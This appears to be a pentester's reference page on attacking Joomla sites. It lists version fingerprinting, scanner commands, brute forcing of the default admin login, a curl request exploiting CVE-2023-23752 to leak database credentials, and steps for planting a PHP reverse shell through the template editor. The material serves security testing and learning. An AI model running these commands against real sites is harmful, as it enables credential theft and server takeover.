Joomla CMS
Joomla is an open-source Content Management System (CMS) written in PHP. The version 5 is currently in development (2024).
- GitHub (4.4k β)
- Documentation (βͺ)
You can see the repartition of active Joomla installations here.
The admin panel default URI is: /administrator.
Joomla Pentester Notes β οΈ
The /robots.txt file may contain the list of interesting paths. If the website was not properly configured, /README.txt may be accessible. It's also possible that there is a tag <meta name="generator" ...>.
It some versions, we may be able to access /administrator/manifests/files/joomla.xml, /media/system/js/, or /plugins/system/cache/cache.xml (rather unreliable and outdated) to find the version.
$ curl [...].xml | xmllint --format -
- OWASP initiated the development of joomscan (1.0k β)
$ sudo apt install joomscan
$ joomscan -u URL
[+] Detecting Joomla Version
[++] Joomla x.y.z
<SNIP... Nothing of interest>
- You can try to use droopescan (not really useful)
$ droopescan scan joomla --url URL
<SNIP... Nothing of interest>
- You can try to use JoomlaScan (0.1k β, 2022 πͺ¦)
- Default username:
admin. Password set at install time. You can test default credentials using joomla-bruteforce (0.02k β, 2020 πͺ¦) while you should not use it for brute force (it sucks...).
$ wget https://github.com/ajnik/joomla-bruteforce/raw/master/joomla-brute.py
$ cp /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt .
$ python joomla-brute.py -u URL -w http_default_pass.txt --username admin -v
-
CVE-2023-23752: Exposed credentials
[4.0.0, 4.2.7]. See also: PoC (ruby) (0.05k β) or manual exploitation:
$ curl -v URL/api/index.php/v1/config/application?public=true
"dbtype": "mysqli",
"host": "localhost",
"user": "xxx",
"password": "yyy"
"db": "joomla",
- When logged as administrator, you can upload a reverse shell:
In Joomla 3, Navigate to Configuration > Templates > Templates. In Joomla 4, navigate to System > Site Templates. Select a template.
Create a new file or upload one if you can. You can copy-paste a shell:
$ cat revshell.php | xclip -selection clipboard
The file path is shown in the editor, while, for reference, mine was at the URL: URL/templates/<your_selected_site_name>/revshell.php.
π» To-do π»
Stuff that I found, but never read/used yet.
-
/images,/home,/media,/templates,/modules -
/plugins,/includes,/language,/components,/api -
/cache,/libraries,/tmp,/layouts,/administrator -
/media/templates/site/<name>/assets/